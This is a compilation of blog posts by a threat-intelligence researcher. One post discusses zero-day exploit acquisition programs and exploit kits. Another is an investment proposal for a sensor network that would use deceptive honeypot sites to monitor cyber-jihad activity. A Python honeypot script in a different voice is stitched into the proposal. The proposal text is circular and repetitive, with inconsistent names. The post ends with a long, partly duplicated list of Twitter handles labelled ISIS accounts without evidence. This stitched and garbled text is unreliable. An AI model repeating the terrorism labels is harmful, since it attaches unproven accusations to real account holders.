With malicious parties now interested in controlling as many
infected hosts with as little effort as possible, client-side
vulnerabilities will continue to be largely abused in an
efficient way through web malware exploitation kits in 2008. The
events that took place during 2007 clearly demonstrate the
pragmatic attack approaches malicious parties started applying,
namely realizing that an outdated but unpatched on a large scale
vulnerability is just as valuable as a zero day one.

1. https://ddanchev.blogspot.com/2018/10/dancho-danchevs-2010-disappearance.html

2. https://speakerdeck.com/ddanchev/cesa-hp-cyberintel-dancho

3. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

4. https://ddanchev.blogspot.com/2017/01/historical-osint-malicious-malvertising.html

5. https://ddanchev.blogspot.com/2016/04/cybercriminals-launch-malicious.html

6. https://ddanchev.blogspot.com/2016/08/managed-swf-injection-cybercrime.html

Pay-Per-Exploit Acquisition Vulnerability Programs -
Pros and cons? (2018-10-22 17:47)

As [1]ZERODIUM starts paying premium rewards to security
researchers to acquire their previously unreported zero-day
exploits affecting multiple operating systems, software and/or
devices, a logical question emerges in the context of the
program's usefulness and potential benefits, including potential
vulnerabilities within the actual acquisition process: how would
the program undermine the security industry, and what would be
the eventual outcome for the security researcher in terms of
[2]fueling growth in the cyber warfare market segment?

In this post I'll discuss the market segment for pay-per-exploit
acquisition programs and discuss in-depth the current
exploit-acquisition methodology utilized by different vendors,
and provide in-depth discussion on various over-the-counter
acquisition methodologies applied by malicious attackers on
their way to monetize access to malware-infected hosts while
compromising the confidentiality, availability and integrity of
the targeted host, including an active discussion on the ongoing
and potential weaponization of zero day vulnerabilities in the
context of today's cyber warfare world.

Having greatly realized the potential of acquiring zero day
vulnerabilities for the purpose of actively exploiting end
users, malicious actors have long been aware of the [3]over-
the-counter acquisition market model, further enhancing their
capabilities when launching malicious campaigns. Among the most
widely [4]spread myths about zero day vulnerabilities is the
claim that [5]zero day vulnerabilities are the primary growth
factor of the cybercrime ecosystem, further resulting in a
multitude of malicious activity targeting end users.



With vendors continuing to establish the foundations for active
vulnerability and exploit acquisition programs, third-party
vendors and research organizations continue successfully
disintermediating the vendors' major vulnerability and exploit
acquisition programs, resulting in the launch and establishment
of third-party services and products that further populate the
security industry with related products and services. These
potentially acquire "know-how" and relevant vulnerability and
exploit information from major vendors, further launching
related companies and services, and potentially empowering
third-party researchers, vendors and individuals, including
nation-state actors, with potential weaponization capabilities,
potentially leading to successful target-acquisition practices
on behalf of third-party researchers and individuals.

Becoming a target in the widespread context of third-party
vendors and researchers might not be the wisest approach when
undermining potential research, in-house research and
benchmarking activities in terms of evaluating and responding to
vulnerabilities and exploits. Vendors looking for ways to
efficiently improve their overall security and product
performance in terms of security should consider basic internal
benchmarking practices, and should also consider a possible
incentive-based vulnerability and exploit reward type of
revenue-sharing program, potentially rewarding company employees
and researchers with the necessary tools and incentives to find,
discover and report security vulnerabilities and exploits.

Something else worth pointing out in terms of vulnerability
research and exploit discovery is a process which can be best
described as the life-cycle of a zero day vulnerability and
exploit. It is best described as a long-run process utilized by
malicious and fraudulent actors successfully using client-side
exploits for the purpose of dropping malicious software on the
hosts of the targeted victims. These exploits often rely on
outdated and patched vulnerabilities, on the overall
misunderstanding that zero day vulnerabilities and exploits are
the primary growth factor of the security industry, and on the
fact that end users and enterprises are often unaware of the
basic fact that cybercriminals often rely on outdated and
patched vulnerabilities, successfully targeting thousands of
users globally on a daily basis.

What used to be a market segment dominated by DIY
(do-it-yourself) exploit and malware-generating tools is today a
modern market segment dominated by Web malware exploitation kits
successfully affecting thousands of users globally on a daily
basis. In terms of Web malware exploitation kits, among the most
common misconceptions regarding the utilization of such kits is
the belief that the cybercriminals behind them rely on newly
discovered exploits and vulnerabilities, when in fact they rely
on [6]outdated and already patched security vulnerabilities and
exploits for the purpose of successfully enticing thousands of
users globally into falling victim to social-engineering driven
malicious and fraudulent campaigns.

Despite the evident usefulness from a malicious actor's point of
view when launching malicious campaigns, malicious actors
continue utilizing outdated vulnerabilities for the purpose of
launching malicious campaigns, further utilizing a multitude of
social engineering attack vectors to enhance the usefulness of
the exploitation vector. Another crucial aspect of the
pay-per-exploit acquisition vulnerability model is the reliance
on outdated and unpatched vulnerabilities for the purpose of
launching malicious campaigns, further relying on the basic fact
that on the majority of occasions end users fail to successfully
update their third-party applications, often exposing themselves
to a variety of successful malicious campaigns utilizing
outdated and unpatched vulnerabilities.

We expect to continue observing an increase in the pay-per-
exploit acquisition model, with related acquisition model
participants continuing to acquire vulnerabilities, further
fueling growth in the market segment. We expect that malicious
actors will adequately respond through over-the-counter
acquisition models, including the utilization of outdated and
unpatched vulnerabilities. End users are advised to continue
ensuring that their third-party applications are updated, to
build a general security awareness, and to ensure that they're
running a fully patched antivirus solution.

Consider going through the following related posts:

[7]Researchers spot new Web malware exploitation kit

[8]Web malware exploitation kits updated with new Java
exploit

[9]Which are the most commonly observed Web exploits in
the wild?

[10]Report: Patched vulnerabilities remain prime exploitation
vector

[11]Report: malicious PDF files becoming the attack vector of
choice

[12]Malvertising campaigns at multiple ad networks lead to
Black Hole Exploit Kit

[13]56 percent of enterprise users using vulnerable Adobe
Reader plugins

[14]Report: third party programs rather than Microsoft
programs responsible for most vulnerabilities

[15]Report: malicious PDF files becoming the attack vector of
choice

[16]Malvertising campaigns at multiple ad networks lead to
Black Hole Exploit Kit

[17]56 percent of enterprise users using vulnerable Adobe
Reader plugins

[18]Report: third party programs rather than Microsoft
programs responsible for most vulnerabilities

[19]Report: 64% of all Microsoft vulnerabilities for 2009
mitigated by Least Privilege accounts

[20]Secunia: popular security suites failing to block exploits

[21]37 percent of users browsing the Web with insecure Java
versions

[22]Which are the most commonly observed Web exploits in
the wild?

[23]Report: Malicious PDF files comprised 80 percent of all
exploits for 2009

[24]Secunia: Average insecure program per PC rate remains
high

1. https://zerodium.com/program.html
2. https://www.webroot.com/blog/2013/12/27/cybercrime-trends-2013-year-review/
3. http://www.zdnet.com/article/black-market-for-zero-day-vulnerabilities-still-thriving/
4. https://www.zdnet.com/article/seven-myths-about-zero-day-vulnerabilities-debunked
5. https://www.zdnet.com/article/report-patched-vulnerabilities-remain-prime-exploitation-vector/
6. https://www.zdnet.com/article/a-patched-browser-false-feeling-of-security-or-a-security-utopia-that-actually-exists/
7. https://www.zdnet.com/article/researchers-spot-new-web-malware-exploitation-kit/
8. https://www.zdnet.com/blog/security/web-malware-exploitation-kits-updated-with-new-java-exploit/9849
9. https://www.zdnet.com/blog/security/which-are-the-most-commonly-observed-web-exploits-in-the-wild/10261
10. https://www.zdnet.com/blog/security/report-patched-vulnerabilities-remain-prime-exploitation-vector/8162
11. https://www.zdnet.com/article/report-malicious-pdf-files-becoming-the-attack-vector-of-choice/
12. https://www.zdnet.com/article/malvertising-campaigns-at-multiple-ad-networks-lead-to-black-hole-exploit-kit/
13. https://www.zdnet.com/article/56-percent-of-enterprise-users-using-vulnerable-adobe-reader-plugins/
14. https://www.zdnet.com/article/report-third-party-programs-rather-than-microsoft-programs-responsible-for-most-vulnerabilities/
15. https://www.zdnet.com/article/report-malicious-pdf-files-becoming-the-attack-vector-of-choice/
16. https://www.zdnet.com/article/malvertising-campaigns-at-multiple-ad-networks-lead-to-black-hole-exploit-kit/
17. https://www.zdnet.com/article/56-percent-of-enterprise-users-using-vulnerable-adobe-reader-plugins/
18. https://www.zdnet.com/article/report-third-party-programs-rather-than-microsoft-programs-responsible-for-most-vulnerabilities/
19. https://www.zdnet.com/article/report-64-of-all-microsoft-vulnerabilities-for-2009-mitigated-by-least-privilege-accounts/
20. https://www.zdnet.com/article/secunia-popular-security-suites-failing-to-block-exploits/
21. https://www.zdnet.com/article/37-percent-of-users-browsing-the-web-with-insecure-java-versions/
22. https://www.zdnet.com/article/which-are-the-most-commonly-observed-web-exploits-in-the-wild/
23. https://www.zdnet.com/article/report-malicious-pdf-files-comprised-80-percent-of-all-exploits-for-2009/
24. https://www.zdnet.com/article/secunia-average-insecure-program-per-pc-rate-remains-high/
Cyber Security Project Investment Proposal - DIA Needipedia - Fight Cybercrime and Cyber Jihad With Sensors - Grab Your Copy Today! (2018-12-16 13:52)

Dear blog readers, I decided to share with everyone a currently pending project investment proposal regarding the upcoming launch of a proprietary Technical Collection analysis platform, with the project proposal draft available on request as part of [1]DIA's Needipedia Project Proposal Investment draft or eventually through the [2]Smith Richardson Foundation.

In case you're interested in working with me for the purpose of implementing the project solution, including a possible investment proposal on your behalf - that also includes a possible VC or an angel investor introduction - I can be reached at dancho.danchev@hush.com

Looking forward to receiving your comments, questions, feedback and general remarks, including possible investment proposal requests. Happy Holidays!

Enjoy!

01. Executive summary

The Obmonix platform aims to build the world's most versatile and comprehensive sensor network for intercepting cybercrime and cyber jihad activity on a global scale, successfully positioning the project as a leading in-house built provider for actionable intelligence within the Intelligence Community.

02. What are you trying to do?

The Obmonix platform aims to build the world's most versatile and comprehensive sensor network for intercepting cybercrime and cyber jihad activity, successfully positioning the platform as a leading in-house provider of actionable intelligence within the Intelligence Community.

03. How is it currently done?

Largely relying on a selected set of outsourced intelligence-gathering providers, the Intelligence Community's overall reliance on commercial intelligence gathering providers has successfully positioned the Intelligence Community with a limited sight in terms of pro-active and systematic response to cybercrime and cyber jihad events globally.

04. What's new?

Largely relying on the utilization of multiple interception vectors including hybrid-based type of sensor networks, the Intelligence Community is successfully positioned to successfully intercept and proactively respond to a growing set of cybercrime and cyber jihad events globally.

05. Who cares?

The Intelligence Community, largely positioned to take advantage of a growing set of technologies for the purpose of pro-actively responding to a growing set of cybercrime and cyber jihad events globally, is ultimately empowered to take advantage of modern hybrid-based type of sensor networks for the purpose of successfully intercepting and responding to a growing set of cybercrime and cyber jihad events globally.

06. What are the risks?

Successfully positioning the provider as a leading provider for actionable intelligence in terms of cybercrime and cyber jihad events globally within the Intelligence Community will successfully position the Obmonix platform and its operator as a leading provider of actionable intelligence within the Intelligence Community.

Transmittal Letter

My name is Dancho Danchev. I'm an internationally recognized cybercrime researcher, security blogger and threat intelligence analyst currently maintaining some of the industry's leading threat intelligence gathering information-sharing resources, having successfully contributed to the overall demise of cybercrime internationally, having successfully monitored, analyzed and processed some of the industry's major nation-state and malicious actor type of malicious campaigns over the last decade, leading me to a successful career as a cybercrime researcher, security blogger and threat intelligence analyst, leading me to a successful launch of my newly launched startup named Disruptive Individuals and the Obmonix - Cybercrime and Cyber Jihad Fighting Sensor Network.

Having successfully pioneered my own methodology for processing threat intelligence data, including active dissemination of threat intelligence data to a variety of sources, including an in-depth understanding of the Intelligence Cycle, I'm certain that based on my experience the time has come to establish a professional and working relationship with a government-private sector enterprise, leading me to a successful project proposal within the Intelligence Community and the security industry.

My initial goal for submitting a project proposal is to ensure that the Intelligence Community remains on the top of its game and that the United States remains ahead of adversaries looking to profit from its economic might, including the successful compromise of its infrastructure, potentially targeting the lives and well-being of its citizens globally.

Largely relying on a set of industry-leading contacts, my initial idea is to ensure that the Intelligence Community remains actively empowered with the world's largest and most comprehensive platform for monitoring, profiling and proactively responding to malicious nation-state malicious actors type of cybercrime and cyber-jihad activity globally through the successful establishing of a government-private sector type of partnership, leading me to a successful launch of my own company, leading me to a successful project-based type of project proposal.

Having actively contributed to the overall demise of cybercrime internationally through the last decade, I'm certain that my expertise, ambition and expertise in the field will successfully contribute to the Intelligence Community's overall mission, including a currently active project within the Intelligence Community and the security industry.

I sincerely hope that my project proposal will be eventually funded, leading me to become an active participant within the Intelligence Community with a currently active project within the Intelligence Community and the security-industry.
Disruptive Individuals - Company Overview

The following brief will provide a detailed summary of the company overview including key success factors and a project taxonomy.

Disruptive Individuals is a research-intensive data-driven company successfully establishing the world's largest snapshot of malicious cybercrime activity for the purpose of offering the industry the world's most versatile portfolio of malicious cybercrime-driven services, successfully positioning itself as the world's leading provider of real-time intelligence-driven services and product portfolio, including cybercrime-research data, malicious activity profiling services and custom-tailored intelligence assessments, successfully positioning the company as the world's leading provider of cybercrime-data driven research-intensive intelligence data-driven company.

Key Success Factors

• the platform will be ultimately capable of establishing the industry's largest data set of cybercrime activity for the purpose of real-time monitoring and profiling of malicious cybercrime activity, successfully infiltrating the majority of cybercrime forum communities, successfully establishing the foundations for an intelligence gathering process
• the platform will be ultimately capable of real-time forum data localization for the purpose of successfully establishing the foundations for a successful intelligence gathering process
• the platform will be ultimately capable of establishing the foundations for real-time monitoring and profiling of malicious activity including forum member data, successfully establishing the foundations for a successful intelligence gathering process
• the platform will be ultimately capable of establishing the world's largest data set of historical cybercrime activity, successfully establishing the foundations for a successful intelligence gathering process

Return on Investment

• research-based forum activity driven intelligence feeds
• the company will be ultimately capable of offering subscription based type of intelligence driven services including intelligence and data-driven cybercrime and malicious-activity capable feeds
• community-driven data processing capabilities
• the company will be ultimately capable of offering public feeds to include the necessary data for the purpose of establishing an active community-based intelligence-data driven type of intelligence-data driven type of services and feeds
• intelligence feed subscription type of managed intelligence-feed driven services
• the company will be ultimately capable of offering tailored intelligence-driven data feeds successfully empowering security enthusiasts, security experts, researchers and government contractors with the necessary data and expertise to offer an insight into the company's vast network of data and intelligence driven type of services

Company Data Project Taxonomy

This intelligence brief will detail the basic company project taxonomy structure for the purpose of establishing the foundations for a successful data and intelligence-driven type of research based type of cybercrime and malicious-activity tracking activity, to include but not limited to cybercrime community forum data and active social media monitoring and profiling capabilities.

Cybercrime Sensor Network

This intelligence brief will detail the basic company project taxonomy structure for the purpose of establishing the foundations for a successful data and intelligence-driven type of research based type of cybercrime and malicious-activity tracking activity, to include but not limited to cybercrime community forum data and active social media monitoring and profiling capabilities.

Spam Message

• spam source
• spam message
• nation-state actors
• malicious-adversaries
• country
• hosting provider
• ASN
• IP reputation
• message
• embedded URL
• embedded attachment

Phishing Message

• phishing source
• phishing message
• nation-state
• malicious-actors
• spear-phishing
• targeted-attack
• country
• hosting provider
• ASN
• IP reputation
• message
• embedded URL
• embedded attachment

Malicious Software

• nation-state actors
• malicious-adversaries
• C&C phone back location
• country
• hosting location
• ASN
• screenshot
• malicious MD5

Malicious URL

• nation-state actors
• malicious-adversaries
• country
• hosting provider
• ASN
• client-side exploitation
• client-side exploit sample

Android malware

• nation-state actors
• malicious-adversaries
• C&C phone back
• country
• hosting provider
• ASN
• SMS feature
• screenshot
• malicious MD5

Mac OS X malware

• nation-state actors
• malicious-adversaries
• C&C phone back
• country
• hosting provider
• ASN
• screenshot
• malicious MD5

Explanation of Honeypot Technology

Honeypot technology greatly ensures that actionable and real-time data of jihadist activities can be acquired, profiled and analyzed, acting as an early warning system for jihadist activity online. It relies on the systematic positioning of misconfigured network devices to better allow the use of monitoring sensors attracting malicious traffic, leading to an eventual compromise allowing for a better understanding of the motivation and capability estimation of the attacker, including active motivation and capabilities type of attribution, leading to the production of actionable real-time type of intelligence type of research and analysis type of data.
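The sensor the paragraph above describes, reduced to a runnable low-interaction honeypot, as an added example: this is not the Obmonix platform's or the author's code. It assumes a hypothetical local bind address of 127.0.0.1:8080 and a constructed sample contact from 203.0.113.7 (a documentation address, not a real capture). Each connection becomes one JSON event carrying the fields a sensor can observe by itself (source address, destination port, a guess at the protocol the client spoke, the first bytes seen); the country, ASN and IP reputation fields in the taxonomy above are enrichment a later stage adds to this record.

```python
"""Low-interaction TCP honeypot sensor (added example, not the Obmonix code).

It listens on a port that nothing legitimate should contact, serves no real
content, and turns every contact into one structured JSON event. Because a
sensor has no legitimate users, every event is signal rather than a log that
must be filtered, which is what makes it usable as an early warning.
"""
import json
import socket
import threading
import time
from dataclasses import dataclass, asdict

# Fixed reply: a generic 404 so the sensor looks like an uninteresting web server.
BANNER = b"HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\nConnection: close\r\n\r\n"

HTTP_METHODS = (b"GET", b"POST", b"HEAD", b"PUT", b"OPTIONS", b"CONNECT", b"DELETE")


@dataclass
class SensorEvent:
    ts: float               # unix time the connection was seen
    sensor_id: str          # which sensor in the network produced the event
    src_ip: str
    src_port: int
    dst_port: int
    protocol_guess: str     # what the client appeared to speak
    first_bytes_hex: str    # up to 32 bytes of the first read, hex encoded


def classify_first_bytes(data: bytes) -> str:
    """Cheap protocol fingerprint from the first bytes a client sends."""
    if not data:
        return "silent"               # connected, sent nothing: scan-like behaviour
    if data.startswith(b"SSH-"):
        return "ssh-client"           # SSH identification string
    if data[:1] == b"\x16" and data[1:3] in (b"\x03\x00", b"\x03\x01", b"\x03\x02", b"\x03\x03"):
        return "tls-clienthello"      # TLS record type 0x16 (handshake), version 3.x
    if data.split(b" ", 1)[0] in HTTP_METHODS:
        return "http-request"
    return "unknown"


def build_event(peer, dst_port, data, sensor_id="sensor-01", ts=None) -> SensorEvent:
    """Normalize one connection into the sensor's event record."""
    return SensorEvent(
        ts=time.time() if ts is None else ts,
        sensor_id=sensor_id,
        src_ip=peer[0],
        src_port=peer[1],
        dst_port=dst_port,
        protocol_guess=classify_first_bytes(data),
        first_bytes_hex=data[:32].hex(),
    )


def event_to_json(ev: SensorEvent) -> str:
    """One JSON object per line, keys sorted so events diff cleanly."""
    return json.dumps(asdict(ev), sort_keys=True)


def handle_connection(conn, peer, dst_port, sink, sensor_id="sensor-01"):
    """Read once, record the event, answer with the fixed banner, hang up."""
    conn.settimeout(3.0)
    try:
        data = conn.recv(1024)
    except OSError:          # timeout or reset: still a contact worth recording
        data = b""
    sink(event_to_json(build_event(peer, dst_port, data, sensor_id)))
    try:
        conn.sendall(BANNER)
    except OSError:
        pass
    finally:
        conn.close()


def serve(bind="127.0.0.1", port=8080, sink=print, sensor_id="sensor-01"):
    """Blocking accept loop; one thread per contact so a slow peer cannot stall the sensor."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen(64)
        while True:
            conn, peer = srv.accept()
            threading.Thread(target=handle_connection,
                             args=(conn, peer, port, sink, sensor_id), daemon=True).start()


if __name__ == "__main__":
    # Constructed sample contact (not a real capture): a plain web probe from
    # 203.0.113.7, printed exactly as the sensor would emit it.
    sample = build_event(("203.0.113.7", 51000), 8080, b"GET / HTTP/1.1\r\n", ts=0.0)
    print(event_to_json(sample))
    serve()   # then listen on 127.0.0.1:8080 until interrupted
```

Run it and connect to 127.0.0.1:8080 with a browser or curl to see one event per contact on stdout. The design choice worth noting is that the sensor never runs a real service and only ever answers a fixed 404, so the host exposes nothing beyond the listener itself, while the "silent" class lets connection-only scans be told apart from clients that actually spoke a protocol.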

Honeypot Deployment Strategy

Honeypot technology greatly ensures that actionable and real-time data of jihadist activities can be acquired, profiled and analyzed, acting as an early warning system for jihadist activity online.

• Fake Newspaper - Al-Jihah

The initial idea behind setting up a fake newspaper (in Persian, Arabic) would be to establish the foundation for a successful deceptive early warning system sensor, further ensuring that actionable and real-time jihadist activity data can be collected, profiled and interpreted for producing real-time intelligence summary reports. Daily updates with pro-jihadist material would ensure the quality acquisition of traffic, including potential deceptive campaigns to be intercepted, profiled and analyzed, acting as an early warning system sensor further ensuring the collection of actionable real-time jihadist activities data.

The Al-Jilah newspaper would act as a central repository for various anti-jihad content, successfully positioning the paper as a primary attack target for cyber jihadists online, successfully increasing the probability for a successful attack and eventually collecting and interpreting the attack data. The Al-Jilah newspaper would act as a central repository of anti-jihad content and would be localized in Persian and Arabic, successfully penetrating local and highly segmented markets for the purpose of increasing the probability of a successful attack.

Various public placement strategies in terms of positioning the honeypot technology within the eventual attack compromise activity would include active search engine optimization techniques, successfully leading to a great degree of capability estimation attack traffic, and would also result in eventual direct forum placement within various prominent jihadist activity online forum communities.
• Fake Bank - Arabah Financing

The initial idea behind setting up a fake bank (in Persian, Arabic) would be to establish the foothold of a deceptive campaign ensuring the collection of actionable real-time jihadist data to be analyzed and profiled. Successfully positioning the bank within the network assets acquisition would ensure the collection of actionable and real-time jihadist data, further ensuring the successful interception of jihadist activities online.

The initial idea behind setting up a fake bank would be to successfully position a fake Web site, successfully resulting in the active deployment of honeypot appliance technologies for the purpose of monitoring and profiling various jihadist activity online. Successfully setting up a fake bank in Persian and Arabic would result in the active penetration of various market segment properties, successfully resulting in the active profiling and monitoring of jihadist activity online.

Successfully setting up a fake bank would result in the active publication of content inter-related news releases emphasizing major localized and segment released type of content, successfully resulting in the active profiling and monitoring of various jihadist activity online. Successful positioning in terms of points of contact would ensure active phishing and malware attack profiling and monitoring, successfully resulting in active profiling and monitoring of jihadist activity online.

• Fake University - Abkazah University

The initial idea behind setting up a fake university (in Persian, Arabic) would be to establish the foothold of a deceptive campaign ensuring the collection of actionable real-time jihadist data to be analyzed and profiled. Successfully positioning the bank within the network assets acquisition would ensure the collection of actionable and real-time jihadist data, further ensuring the successful interception of jihadist activities online. Successful positioning in terms of points of contact would ensure active phishing and malware attack profiling and monitoring, successfully resulting in active profiling and monitoring of jihadist activity online.

The initial idea of setting up a fake university would result in the active profiling and monitoring of various jihadist community type of jihadist activity online, successfully positioning a fake university localized in Persian and Arabic, successfully resulting in the active profiling and monitoring of jihadist activity online. Sample fake university content, a localized fake university portfolio of facilities and educational courses, would result in the active positioning for a localized and segmented active profiling and monitoring of jihadist activity online.

It would consist of an active SCADA research and cyber security type of research and analysis facility allowing the active monitoring of malicious activity for the origin source countries Iran, Pakistan, Saudi Arabia, Iraq and Syria. Successful positioning in terms of points of contact would ensure active phishing and malware attack profiling and monitoring, successfully resulting in active profiling and monitoring of jihadist activity online.

• Fake Company - Ostan Industries

The initial idea behind setting up a fake company would be to successfully intercept and profile actionable real-time jihadist activities online, to successfully intercept and profile various jihadist activities online. The initial idea behind setting up a fake company would be to position a SCADA type of infrastructure localized in Persian, Arabic for the purpose of successfully profiling and monitoring various jihadist activity online.

With a successful placement and active content generation localized in Persian, Arabic, a fake company deployment using honeypot appliance technology would result in active capability estimation and profiling of various jihadist activity online. Successful positioning in terms of points of contact would ensure active phishing and malware attack profiling and monitoring, successfully resulting in active profiling and monitoring of jihadist activity online.

Cyber Jihad Sensor Network

This intelligence brief will detail the basic company project taxonomy structure for the purpose of establishing the foundations for a successful data and intelligence-driven type of research based type of cybercrime and malicious-activity tracking activity, to include but not limited to cybercrime community forum data and active social media monitoring and profiling capabilities.

• forum topic
the platform will be ultimately capable of processing a particular forum topic for the purpose of establishing the foundations for a successful intelligence gathering process

• forum message
the platform will be ultimately capable of processing a particular forum message for the purpose of establishing the foundations for a successful intelligence gathering process

• forum member
the platform will be ultimately capable of processing a particular forum member for the purpose of establishing the foundations for a successful intelligence gathering process

• forum member message
the platform will be ultimately capable of processing a particular forum member message for the purpose of establishing the foundations for a successful intelligence gathering process

• forum message
the platform will be ultimately capable of processing a particular forum message for the purpose of establishing the foundations for a successful intelligence gathering process

• forum message
the platform will be ultimately capable of processing a particular forum external message for the purpose of successfully establishing the foundations for a successful intelligence gathering process

• forum time
the platform will be ultimately capable of processing a particular forum time for the purpose of establishing the foundations for a successful intelligence gathering process

• forum data
the platform will be ultimately capable of processing data including date, time, message, URI and email, ultimately establishing the foundations for a successful intelligence gathering process

• forum URL
the platform will be ultimately capable of processing a particular forum URL, further establishing the foundation for the Obnomix platform, further establishing the foundations for a successful intelligence gathering process

• forum media
the platform will be ultimately capable of processing forum media, further establishing the foundations for the Obnomix platform, further establishing the foundations for a successful intelligence gathering process

• forum email
the platform will be ultimately capable of processing forum email, further establishing the foundations for the Obnomix platform, further establishing the foundations for a successful intelligence gathering process

• forum contact
the platform will be ultimately capable of processing forum contact, further establishing the foundations for the Obnomix platform, further establishing the foundations for a successful intelligence gathering process

Sample ISIS Social Media Twitter Accounts:

• https://twitter.com/As_soumaly
• https://twitter.com/wilayat_cairo56
• https://twitter.com/ISmisMUJAHIDAH
• https://twitter.com/islamdamasl980 40k
• https://twitter.com/HA_alshami03
• https://twitter.com/jundi71033868
• https://twitter.com/nor92331
• https://twitter.com/WmWmWm57
• https://twitter.com/tytxzxxz
• https://twitter.com/raisiiiiii
• https://twitter.com/FIIIIII2015
• https://twitter.com/BrCdPrsnr
• https://twitter.com/leembfs2017
• https://twitter.com/Sheb84669751
• https://twitter.com/GMCTNT_1979
• https://twitter.com/i593162
• https://twitter.com/bela_hudood
• https://twitter.com/_u_r7yok
• https://twitter.com/kalmat_haaq
• https://twitter.com/meersbo2
• https://twitter.com/iahmd61
• https://twitter.com/TurMedia316
• https://twitter.com/shamtu_33
• https://twitter.com/hoecl5
• https://twitter.com/ll41lll
• https://twitter.com/AIJabarti45
• https://twitter.com/abo_roqaia82
• https://twitter.com/inmyheartisis
• https://twitter.com/gurababizl551
• https://twitter.com/jhkghjy
• https://twitter.com/HeroJsis_711
• https://twitter.com/itc_hallo
• https://twitter.com/TurMedia316
• https://twitter.com/JUI_Lj
• https://twitter.com/SomQaeda
• https://twitter.com/TARLEE4
• https://twitter.com/Muj_93_Hed
• https://twitter.com/dieebkhel
• https://twitter.com/HJdjdu
• https://twitter.com/anwartab
• https://twitter.com/SYRIA_GID
• https://twitter.com/Xkb038
• https://twitter.com/MKoshur2
• https://twitter.com/abutalut8
• https://twitter.com/AEJKhalil
• https://twitter.com/abu2legend
• https://twitter.com/Gqeflfwlemqpdmf
• https://twitter.com/alhlby027
• https://twitter.com/SuehwShehe
• https://twitter.com/sdsdsd325245
• https://twitter.com/gffgglll
• https://twitter.com/ISIS_1979GMC
• https://twitter.com/dola24687
• https://twitter.com/timbosulli
• https://twitter.com/f75da586675f456
• https://twitter.com/khilafahinfos
• https://twitter.com/allbasra
• https://twitter.com/Muhaajirah_
• https://twitter.com/abufalahalhincl4
• https://twitter.com/Saeecl_alHalabiO
• https://twitter.com/iislamicl2
• https://twitter.com/TaWhEeD_0
• https://twitter.com/avuOmar_shams
• https://twitter.com/abouanstunisi
• https://twitter.com/homsiia
• https://twitter.com/4_7m0o0cl
• https://twitter.com/Djoiyriajw
• https://twitter.com/96176629289
• https://twitter.com/killer_cail99
• https://twitter.com/mfawasl
• https://twitter.com/ohatab8
• https://twitter.com/Ultrasmusliml
• https://twitter.com/A05462492
• https://twitter.com/azve76
• https://twitter.com/ClemStalDim
• https://twitter.com/mahmood
• https://twitter.com/aqill41
• https://twitter.com/iahmd61
• https://twitter.com/azve76
• https://twitter.com/PicotNo
• https://twitter.com/h_a_e23
• https://twitter.com/goo_ias
• https://twitter.com/_irl_toby6
• https://twitter.com/samhalo
• https://twitter.com/samhalo
• https://twitter.com/rdcongo_news
• https://twitter.com/hytegetydyte
• https://twitter.com/f75da586675f456
• https://twitter.com/Muj_93_Hed
• https://twitter.com/abohashmily
• https://twitter.com/Alhareth_2
• https://twitter.com/wfsfsd
• https://twitter.com/FoopSeven
• https://twitter.com/azve77
• https://twitter.com/Ali_G303L
• https://twitter.com/R9O7GupXDM0b0pd
• https://twitter.com/georgebintol
• https://twitter.com/nightwalker_74he
• https://twitter.com/ahmadvasvv565
• https://twitter.com/Ansar_AIShariaO
• https://twitter.com/Alsloli_dog/media
• https://twitter.com/inmyheartisis
• https://twitter.com/om_elbarael
• https://twitter.com/saadsaudi2014
• https://twitter.com/timotim91217281
• https://twitter.com/ii_o_01ru
• https://twitter.com/aljanady75
• https://twitter.com/KatzOUmAIBaraaO
• https://twitter.com/_Mi_Sk_
• https://twitter.com/Misk_2_a
• https://twitter.com/ISIS1995DD
• https://twitter.com/moohgerl21
• https://twitter.com/Omisshaq
• https://twitter.com/qatada_93
• https://twitter.com/ls_zarkiue
• https://twitter.com/Ali_G303L
• https://twitter.com/fgh959
• https://twitter.com/sdg42303540
• https://twitter.com/alptter_
• https://twitter.com/umaisha55
• https://twitter.com/algwsd2233
• https://twitter.com/dfgndf2
• https://twitter.com/leembfs2017
• https://twitter.com/wearekillkofar
• https://twitter.com/Om_islam47
• https://twitter.com/islamicJso
• https://twitter.com/_a_a_20
• https://twitter.com/truth_ee
• https://twitter.com/Fahad_Buhend
• https://twitter.com/lmj_hallo
• https://twitter.com/er_er_500
• https://twitter.com/86Roben
• https://twitter.com/DsdsdsfSddsd
• https://twitter.com/abu_a_88
• https://twitter.com/sadkingp20
• https://twitter.com/noor_sban6
• https://twitter.com/is5_is5
• https://twitter.com/JUI_LJ
• https://twitter.com/qatada_9
• https://twitter.com/abo_al_zubair
• https://twitter.com/0thmanl4_C4
• https://twitter.com/nedalo9314
• https://twitter.com/SamalQ__90
• https://twitter.com/Mar44ma
• https://twitter.com/Manaln9
• https://twitter.com/phupeuea
• https://twitter.com/raisiiiiii
• https://twitter.com/aljanady75/
• https://twitter.com/_Mi_Sk_
• https://twitter.com/Misk_2_a
• https://twitter.com/ISIS1995DD
• https://twitter.com/moohgerl21
• https://twitter.com/198_mazen
• https://twitter.com/CavalierDuSham
• https://twitter.com/SinaiTor
• https://twitter.com/NaserlS8
• https://twitter.com/oumme_aymenlO
• https://twitter.com/gaznaya
• https://twitter.com/un_serviteur
• https://twitter.com/Tekindebeyvin
• https://twitter.com/_DaviclThomson
• https://twitter.com/VegetaMoustache
• https://twitter.com/Millatlbrahiml
• https://twitter.com/Hayati_LiLLah_
• https://twitter.com/Alittl245
• https://twitter.com/salehalawlqil
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• https://twitter.com/SimNasr 

• https://twitter.com/xonraqqa 

• https://twitter.com/aoclaaocla4 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/anwartab 




• https://twitter.com/waswa0127 

• https://twitter.com/ali523480 

• https://twitter.com/Rhbclbcll 

• https://twitter.com/AnsarAISharial3 

• https://twitter.com/AIJabarti46 

• https://twitter.com/lslamiyaKurcli 

• https://twitter.com/zayanepower 

• https://twitter.com/WalaAnclBara 

• https://twitter.com/SFKIIIHHF __o033 

• https://twitter.com/AAclhimlO 

• https://twitter.com/MhclSayf 

• https://twitter.com/abo_67 _omar 

• https://twitter.com/DawlaBrulFrance 

• https://twitter.com/strange76292811 

• https://twitter.com/Vbnlsrt 

• https://twitter.com/IS_IS021 

• https://twitter.com/IS_IS022 

